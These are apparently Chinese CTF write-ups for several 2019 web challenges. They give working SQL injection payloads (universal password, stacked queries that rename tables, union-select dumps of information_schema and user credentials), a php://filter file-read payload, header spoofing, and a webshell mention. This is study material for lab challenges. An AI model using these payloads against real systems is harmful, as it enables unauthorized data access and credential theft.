[强网杯 2019]随便注
万能密码:1'or 1=1#,有两个字段,省去了order by
试试union select 1,2#
select和where被过滤了,联合查询行不通只能试试堆叠查询-1';show tables;
因为select被过滤了,所以就算堆叠查询也不能直接查flag,这里的操作是先改列名,再改表名,z最后利用题目自身的select查flag
alter table 表名 change column 旧列名 新列名 数据类型;
alter table 旧名字 rename to 新名字;
数字需要用``包裹,字符串不需要引号
注意:这里一顿操作必须在同一次进行,否则题目select报错就终止了以后的语句,只能重开
最终payload:
?inject=1%27;alter%20table%20words%20rename%20to%20word;alter%20table%20`1919810931114514`%20rename%20to%20words;alter%20table%20words%20change%20column%20flag%20id%20char(100);
再次用万能密码就能查到flag
[SUCTF 2019]EasySQL
先试试万能密码1'or 1='1被过滤了
fuzz发现union,from,flag都被过滤了,虽然堆叠查询出了表名和数据库名,但是关键词被过滤了不能常规查询,试了一下只有输入数字能有结果,但是只要输入不是零就返回1,即使是上百万
猜测拼接的参数不是在from后面,而是在select 和from的中间,假设是:
select 0,$query from Flag;
这里返回的数据和输入不怎么对的上,具体我也不知道为什么,但是证明了确实是拼接在select和from中间
那么既然不让输入from,那就直接用题目自身的from,将题目的查询语句从中间分开
猜测拼接后语句类似这个:
select 1;select * from Flag;
最终payload:query=1;select *,1
[极客大挑战 2019]Secret File
f12查看源码发现./Archive_room.php,访问
再次得到action.php,这里action.php做了个重定向,302状态码表示重定向,通过burp suite抓包发现secr3t.php
访问secr3t.php得到最后的源码
根据提示get提交file=flag.php,发现看不到flag
上伪协议,将最下面的base64编码的数据解码即可
?file=php://filter/convert.base64-encode/resource=flag.php
[极客大挑战 2019]LoveSQL
先试试万能密码,登陆成功但是返回的密码是一个md5值
username=admin&password=-1'order by 3#(url编码为%23)查字段数,在order by 4时出错说明有三个字段,以下payload均为浏览器直接提交的值,burpsuite提交需要url编码
username=admin&password=-1'union select 1,2,3%23 看回显
查表名
username=admin&password=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#
查列名
username=admin&password=-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_name='l0ve1ysq1'#
查数据
username=admin&password=-1'union select 1,group_concat(id,username,password),3+from l0ve1ysq1#
[极客大挑战 2019]Http
f12查看源码,Secret.php藏在了最后的后面部分
提示了不是来自https://Sycsecret.buuoj.cn,用burpsuite改包,加上请求头
Referer: https://Sycsecret.buuoj.cn
然后提示用”Syclover" browser,那就在User-Agent的中间任意位置加上Syclover
最后一关添加请求头X-Forwarded-For
X-Forwarded-For:127.0.0.1 //表示来自127.0.0.1即本地连接
[极客大挑战 2019]Knife
这题考的菜刀这个工具的使用,用蚁剑或者其他连接工具也是一样的,密码就是post的参数